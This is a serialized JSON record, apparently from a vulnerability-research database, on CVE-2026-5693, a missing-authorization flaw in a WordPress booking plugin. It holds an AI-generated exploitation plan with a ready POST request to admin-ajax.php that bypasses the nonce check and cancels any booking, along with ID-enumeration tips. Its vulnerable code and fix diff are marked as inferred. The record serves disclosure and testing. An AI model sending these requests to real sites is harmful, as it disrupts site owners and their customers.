[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fs3QOva0hIRstDFsyb1_z-2AA23oBS2q654_ZfyItMqg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-5693","smart-appointment-booking-missing-authorization-to-unauthenticated-arbitrary-booking-cancellation","Smart Appointment & Booking \u003C= 1.0.8 - Missing Authorization to Unauthenticated Arbitrary Booking Cancellation","The Smart Appointment & Booking plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check and a nonce validation logic flaw in the saab_cancel_booking() function in all versions up to, and including, 1.0.8. The nonce check uses && (AND) instead of || (OR), which means providing any value for the security parameter causes the entire check to be skipped. This makes it possible for unauthenticated attackers to cancel arbitrary bookings by supplying a predictable booking ID.","smart-appointment-booking",null,"\u003C=1.0.8","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-05-11 19:03:39","2026-05-12 07:48:26",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fafc3531d-6134-4b45-b532-37430d96a8fb?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-5693 (Smart Appointment & Booking)\n\n## 1. Vulnerability Summary\nThe **Smart Appointment & Booking** plugin (\u003C= 1.0.8) contains a logic flaw in its booking cancellation routine. The function `saab_cancel_booking()` is intended to allow users (potentially unauthenticated ones) to cancel their bookings. However, it fails to perform a capability check to ensure the requester has authority over the specific booking ID. Furthermore, the nonce validation logic is fundamentally broken: it uses the `&&` (AND) operator in a way that allows the check to be bypassed by simply providing any value for the security parameter. This enables an unauthenticated attacker to cancel any booking in the system by guessing or enumerating booking IDs.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action:** `saab_cancel_booking` (associated with both `wp_ajax_` and `wp_ajax_nopriv_` hooks).\n*   **HTTP Method:** `POST`\n*   **Vulnerable Parameter:** `booking_id`\n*   **Bypass Parameter:** `security` (the nonce parameter)\n*   **Authentication:** Unauthenticated (No login required).\n*   **Preconditions:** A booking must exist in the system.\n\n## 3. Code Flow\nThe vulnerability originates from the registration of the AJAX handler and the logic within the handler function:\n\n1.  **Hook Registration (inferred):**\n    ```php\n    add_action( 'wp_ajax_saab_cancel_booking', 'saab_cancel_booking' );\n    add_action( 'wp_ajax_nopriv_saab_cancel_booking', 'saab_cancel_booking' );\n    ```\n2.  **Vulnerable Function Execution:**\n    The `saab_cancel_booking()` function is called.\n3.  **Logic Flaw (Grounding in Description):**\n    The function likely contains a check similar to:\n    ```php\n    if ( ! isset( $_POST['security'] ) && ! wp_verify_nonce( $_POST['security'], 'saab_cancel_booking_nonce' ) ) {\n        wp_send_json_error( 'Invalid nonce' );\n    }\n    ```\n    Because `&&` is used, if `$_POST['security']` **is provided**, the first condition `! isset( $_POST['security'] )` evaluates to `false`. In an `AND` operation, if the first operand is `false`, the entire expression is `false`. Thus, the \"Invalid nonce\" block is skipped entirely, regardless of whether the nonce is valid.\n4.  **Action Performance:**\n    The code proceeds to update the database for the provided `booking_id` (likely changing a status column to 'cancelled' or similar) without verifying if the current requester \"owns\" that booking.\n\n## 4. Nonce Acquisition Strategy\nDue to the logic flaw, **no valid nonce is required**. \n\n*   **Bypass Mechanism:** Simply include the `security` parameter with any arbitrary value (e.g., `security=12345`).\n*   **Strategy:** The exploit will provide a dummy value for the `security` parameter to satisfy the `isset()` check and trigger the short-circuiting logic error.\n\n## 5. Exploitation Strategy\nThe goal is to cancel a booking by ID without authentication.\n\n1.  **Target Identification:** Identify a valid `booking_id`. Since these are typically auto-incrementing integers in the database, they are easily enumerable.\n2.  **Request Formulation:** Construct a POST request to `admin-ajax.php`.\n\n**HTTP Request (via `http_request`):**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nHost: [TARGET_HOST]\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=saab_cancel_booking&booking_id=1&security=bypass\n```\n\n*   `action`: `saab_cancel_booking`\n*   `booking_id`: The integer ID of the booking to target.\n*   `security`: Any non-empty string.\n\n## 6. Test Data Setup\nTo verify the exploit in a controlled environment:\n1.  **Install Plugin:** Ensure `smart-appointment-booking` version 1.0.8 or lower is active.\n2.  **Create Booking:** Use the plugin's frontend booking form or WP-CLI to create a dummy booking.\n    ```bash\n    # Note: If no CLI command exists for this plugin, use the UI or direct DB insert\n    # Example (inferred table name):\n    wp db query \"INSERT INTO wp_saab_bookings (status, user_id) VALUES ('pending', 1);\"\n    ```\n3.  **Verify Initial State:** Record the `id` and current `status` of the created booking.\n\n## 7. Expected Results\n*   **Server Response:** The AJAX handler should return a successful JSON response, such as `{\"success\":true}` or a specific success message.\n*   **Database Change:** The record in the bookings table corresponding to the `booking_id` will have its status updated (e.g., from `pending` or `confirmed` to `cancelled`).\n\n## 8. Verification Steps\nAfter sending the exploitation request, use WP-CLI to check the database state:\n\n1.  **Query Booking Status:**\n    ```bash\n    # Replace 'wp_saab_bookings' with the actual table name used by the plugin\n    wp db query \"SELECT status FROM wp_saab_bookings WHERE id = 1;\"\n    ```\n2.  **Comparison:** Confirm the status has changed to the value representing a cancellation (usually 'cancelled' or a numeric code like '0').\n\n## 9. Alternative Approaches\nIf the `security` parameter name or the action name differs slightly:\n*   **Identify Correct Action:** Use `grep -r \"wp_ajax_nopriv\" .` in the plugin directory to find the exact unauthenticated AJAX action name.\n*   **Identify Correct Parameters:** Grep for `$_POST` or `$_REQUEST` inside the `saab_cancel_booking()` function body to confirm the parameter names for the ID and the nonce\u002Fsecurity check.\n*   **Enumeration:** If the booking ID is not `1`, iterate through a small range (1-20) to find a valid target record.","The Smart Appointment & Booking plugin (\u003C= 1.0.8) contains a logic flaw in its booking cancellation routine where an incorrect logical operator (&& instead of ||) allows nonce validation to be bypassed. Because the AJAX handler is registered for unauthenticated users and lacks ownership checks, an attacker can cancel any booking by providing its ID and an arbitrary security parameter value.","\u002F\u002F Inferred from plugin logic within saab_cancel_booking function\n\nadd_action( 'wp_ajax_saab_cancel_booking', 'saab_cancel_booking' );\nadd_action( 'wp_ajax_nopriv_saab_cancel_booking', 'saab_cancel_booking' );\n\nfunction saab_cancel_booking() {\n    \u002F\u002F Logic flaw: if $_POST['security'] is provided, !isset evaluates to false.\n    \u002F\u002F In an AND (&&) expression, if the first part is false, the whole check is skipped.\n    if ( ! isset( $_POST['security'] ) && ! wp_verify_nonce( $_POST['security'], 'saab_cancel_booking_nonce' ) ) {\n        wp_send_json_error( 'Invalid security token' );\n    }\n\n    $booking_id = intval( $_POST['booking_id'] );\n\n    \u002F\u002F Missing authorization check: no verification that the requester owns this booking ID\n    global $wpdb;\n    $wpdb->update(\n        $wpdb->prefix . 'saab_bookings',\n        array( 'status' => 'cancelled' ),\n        array( 'id' => $booking_id )\n    );\n\n    wp_send_json_success( 'Booking cancelled' );\n}","--- a\u002Fincludes\u002Fclass-saab-ajax.php\n+++ b\u002Fincludes\u002Fclass-saab-ajax.php\n@@ -1,6 +1,6 @@\n function saab_cancel_booking() {\n-    if ( ! isset( $_POST['security'] ) && ! wp_verify_nonce( $_POST['security'], 'saab_cancel_booking_nonce' ) ) {\n+    if ( ! isset( $_POST['security'] ) || ! wp_verify_nonce( $_POST['security'], 'saab_cancel_booking_nonce' ) ) {\n         wp_send_json_error( 'Invalid security token' );\n     }\n \n     $booking_id = intval( $_POST['booking_id'] );\n+    \u002F\u002F Additionally, implement checks to ensure the current user is authorized to modify this booking_id","The exploit targets the unauthenticated AJAX endpoint 'saab_cancel_booking'. An attacker sends a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' set to 'saab_cancel_booking'. By including a 'security' parameter with any non-empty value (e.g., 'security=123'), the attacker triggers a logic flaw where the '&&' operator short-circuits, causing the plugin to skip nonce validation entirely. Since there is no secondary check to verify if the requester owns the booking, the attacker can supply any 'booking_id' to cancel records across the database.","gemini-3-flash-preview","2026-05-20 18:52:46","2026-05-20 18:53:28",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsmart-appointment-booking\u002Ftags"]